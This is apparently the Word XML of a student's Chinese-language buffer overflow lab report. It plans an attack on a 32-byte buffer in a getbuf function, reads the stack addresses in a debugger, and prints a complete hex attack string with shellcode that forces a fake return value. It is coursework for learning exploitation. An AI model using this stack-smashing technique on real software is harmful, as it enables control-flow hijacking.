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5BC024" w14:textId="3C7CD1C8" w:rsidR="00A361C2" w:rsidRDefault="00DD30B9" w:rsidP="00DD30B9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buffer Overflow Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E1A37" w14:textId="7A54CCA3" w:rsidR="00DD30B9" w:rsidRDefault="00DD30B9" w:rsidP="00DD30B9">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2024141460368 </w:t>
      </w:r>
      <w:r>
        <w:t>陈登科</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5585591F" w14:textId="0FD7D874" w:rsidR="00DD30B9" w:rsidRDefault="00106F72" w:rsidP="00E853FB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 制定攻击计划</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C4E69" w14:textId="718AD9C9" w:rsidR="00106F72" w:rsidRDefault="00E853FB" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数getbuf中</w:t>
      </w:r>
      <w:r w:rsidR="00646751">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先定义了</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有32个字节</w:t>
      </w:r>
      <w:r w:rsidR="00646751">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度的buf数组，然后从键盘读入字符串直接放入buf数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60312740" w14:textId="77777777" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00DD30B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BACE20" w14:textId="7AB3F0B5" w:rsidR="00646751" w:rsidRDefault="00646751" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数getbuf的栈帧自低到高依次是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B7095" w14:textId="4A9912B8" w:rsidR="00646751" w:rsidRDefault="00646751" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Variables (buf[0], buf[1], </w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, buf[31])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B92BD" w14:textId="0795C19C" w:rsidR="00646751" w:rsidRDefault="00646751" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Saved EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570CDE4" w14:textId="72619FC4" w:rsidR="00646751" w:rsidRDefault="00646751" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Return Ad</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1AEFF" w14:textId="77777777" w:rsidR="00CC0743" w:rsidRDefault="00CC0743" w:rsidP="00DD30B9"/>
    <w:p w14:paraId="0DDD6B36" w14:textId="5A916016" w:rsidR="00CC0743" w:rsidRDefault="00CC0743" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们知道getbuf函数最后一定是执行ret指令，弹出Return Adress并从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Return Adress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处继续执行指令，我们只需要：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492794D" w14:textId="66660718" w:rsidR="00CC0743" w:rsidRDefault="00CC0743" w:rsidP="00DD30B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过buf溢出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高地址处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Return Adress改成buf的地址</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使程序执行我们在buf里写的木马程序；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C57EF5" w14:textId="77777777" w:rsidR="00CC0743" w:rsidRDefault="00CC0743" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 在buf中编写程序汇编程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC08A9E" w14:textId="01C40B1D" w:rsidR="00CC0743" w:rsidRDefault="00CC0743" w:rsidP="00CC0743">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00106F72">
        <w:t>mov eax, 0xDEADBEEF</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向eax寄存器</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期望的返回值</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，覆盖原来的1）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB44CC" w14:textId="12ED496C" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00CC0743">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00106F72">
        <w:t>push 0x0040126A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（向栈里压入原本的return address，即test函数指令流的地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8BB16E" w14:textId="614EAE70" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00CC0743">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ret（弹出栈顶刚刚压入的地址并返回eax寄存器里写的假返回值）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B051B04" w14:textId="77777777" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00E853FB"/>
    <w:p w14:paraId="6E81ECAA" w14:textId="69039ADC" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00E853FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们需要了解的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B5D5B9" w14:textId="6671E1B3" w:rsidR="00656FF5" w:rsidRDefault="00E853FB" w:rsidP="00E853FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. return address原本的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69B287" w14:textId="25EB2F79" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00E853FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. buf的地址（其实可以直接通过ebp算出来）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C011703" w14:textId="03A560D7" w:rsidR="00656FF5" w:rsidRPr="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00E853FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E853FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. EBP的值（因为覆写return address时会不可避免覆盖掉EBP，我们不希望修改它）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68403110" w14:textId="19E9BC75" w:rsidR="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00E853FB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. 获取必要信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB6124" w14:textId="46258046" w:rsidR="00E853FB" w:rsidRPr="00E853FB" w:rsidRDefault="00E853FB" w:rsidP="00E853FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）看test函数的汇编是获取返回地址的多种方式之一， call _getbuf的下一条指令的地址就是getbuf函数的返回地址，即0x0040126A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF45563" w14:textId="3E69A953" w:rsidR="00DD30B9" w:rsidRDefault="00DD30B9" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB8864F" wp14:editId="7691AA91">
            <wp:extent cx="5274310" cy="2940685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15558309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B010D5" w14:textId="0E5A047F" w:rsidR="00DD30B9" w:rsidRDefault="00E853FB" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r w:rsidR="00656FF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在getbuf中设置断点，打开寄存器窗口，EBP寄存器里存放着getbuf栈帧中存放EBP的地址，即0x0012FE4C。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECB5CD" w14:textId="2BF919A8" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00DD30B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内存窗口输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x0012FE4C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也可以直接输入ebp，我们就可以直接看到EBP的值，注意是小端方式，倒过来读就是0x0012FEA4，同时根据栈帧结构，紧随EBP之后的就是Return Address的值，即0x0040126A，这印证了1）中在test汇编中看到的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD68D73" w14:textId="74FD66E4" w:rsidR="00DD30B9" w:rsidRDefault="00DD30B9" w:rsidP="00DD30B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38612B2B" wp14:editId="78979B64">
            <wp:extent cx="5274310" cy="2940685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="132710814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BA03F" w14:textId="77777777" w:rsidR="00106F72" w:rsidRDefault="00106F72" w:rsidP="00DD30B9"/>
    <w:p w14:paraId="300A4408" w14:textId="493702AF" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00656FF5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. 编写攻击字符串</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="533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0"/>
        <w:gridCol w:w="2388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00106F72" w:rsidRPr="00106F72" w14:paraId="25AF2636" w14:textId="77777777" w:rsidTr="00656FF5">
        <w:trPr>
          <w:trHeight w:val="315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66A13C4" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00106F72">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>汇编指令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E852A29" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="220"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00106F72">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>机器码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106F72" w:rsidRPr="00106F72" w14:paraId="1899777F" w14:textId="77777777" w:rsidTr="00656FF5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4B59ABC0" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:r w:rsidRPr="00106F72">
              <w:t>mov eax, 0xDEADBEEF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A1EBF30" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="220"/>
            </w:pPr>
            <w:r w:rsidRPr="00106F72">
              <w:t>B8 EF BE AD DE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106F72" w:rsidRPr="00106F72" w14:paraId="7D8363EC" w14:textId="77777777" w:rsidTr="00656FF5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14:paraId="5289FB8F" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:r w:rsidRPr="00106F72">
              <w:t>push 0x0040126A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12846E2D" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="220"/>
            </w:pPr>
            <w:r w:rsidRPr="00106F72">
              <w:t>68 6A 12 40 00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106F72" w:rsidRPr="00106F72" w14:paraId="3E498FEB" w14:textId="77777777" w:rsidTr="00656FF5">
        <w:trPr>
          <w:trHeight w:val="310"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="349D620D" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:r w:rsidRPr="00106F72">
              <w:t>ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14C75661" w14:textId="77777777" w:rsidR="00106F72" w:rsidRPr="00106F72" w:rsidRDefault="00106F72" w:rsidP="00106F72">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="220"/>
            </w:pPr>
            <w:r w:rsidRPr="00106F72">
              <w:t>C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B194E84" w14:textId="77777777" w:rsidR="00106F72" w:rsidRDefault="00106F72" w:rsidP="00DD30B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E3DB86" w14:textId="3FF05A05" w:rsidR="00106F72" w:rsidRDefault="00656FF5" w:rsidP="00DD30B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串结构如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3615D" w14:textId="0BB2B10D" w:rsidR="00106F72" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器码（11字节）：</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B8 EF BE AD DE 68 6A 12 40 00 C3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB50BB" w14:textId="7259D57E" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充（21字节）：</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04DEAF" w14:textId="25788869" w:rsidR="00656FF5" w:rsidRPr="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上就是原本为buf数组分配的32字节，以下为溢出部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD0386" w14:textId="5A671FF8" w:rsidR="00106F72" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EBP（4字节）：</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A4 FE 12 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8CBE1B" w14:textId="3B2C469F" w:rsidR="00106F72" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Buf的地址（4字节）：</w:t>
      </w:r>
      <w:r w:rsidR="00106F72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2C FE 12 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD2B06" w14:textId="77777777" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00106F72"/>
    <w:p w14:paraId="56AFC800" w14:textId="4A1C294E" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即：</w:t>
      </w:r>
      <w:r w:rsidRPr="00656FF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B8 EF BE AD DE 68 6A 12 40 00 C3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 A4 FE 12 00 2C FE 12 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C874859" w14:textId="73A4363E" w:rsidR="00656FF5" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B88BD" w14:textId="0ABDCBB9" w:rsidR="00656FF5" w:rsidRPr="00DD30B9" w:rsidRDefault="00656FF5" w:rsidP="00106F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073995B4" wp14:editId="631020B5">
            <wp:extent cx="5274310" cy="2940685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15294438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4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56FF5" w:rsidRPr="00DD30B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2E9F9" w14:textId="77777777" w:rsidR="00055C4D" w:rsidRDefault="00055C4D" w:rsidP="00DD30B9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05577ADA" w14:textId="77777777" w:rsidR="00055C4D" w:rsidRDefault="00055C4D" w:rsidP="00DD30B9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D688BB" w14:textId="77777777" w:rsidR="00055C4D" w:rsidRDefault="00055C4D" w:rsidP="00DD30B9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4B60A3D1" w14:textId="77777777" w:rsidR="00055C4D" w:rsidRDefault="00055C4D" w:rsidP="00DD30B9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1975"/>
    <w:rsid w:val="00055C4D"/>
    <w:rsid w:val="00106F72"/>
    <w:rsid w:val="00646751"/>
    <w:rsid w:val="00656FF5"/>
    <w:rsid w:val="007F2E2B"/>
    <w:rsid w:val="009C1432"/>
    <w:rsid w:val="00A361C2"/>
    <w:rsid w:val="00CC0743"/>
    <w:rsid w:val="00DD30B9"/>
    <w:rsid w:val="00E61975"/>
    <w:rsid w:val="00E85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2A1AD3F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5A5EB9E7-EEBE-4693-903A-83A325F988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197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E619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197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197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197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197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197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197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197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197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E619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19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197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197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197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197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197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197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197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19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197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197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19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197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197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197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19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197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197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D30B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D30B9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D30B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D30B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3</Pages>
  <Words>195</Words>
  <Characters>1116</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>9</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1309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dk c</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>dk c</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-16T13:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T14:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>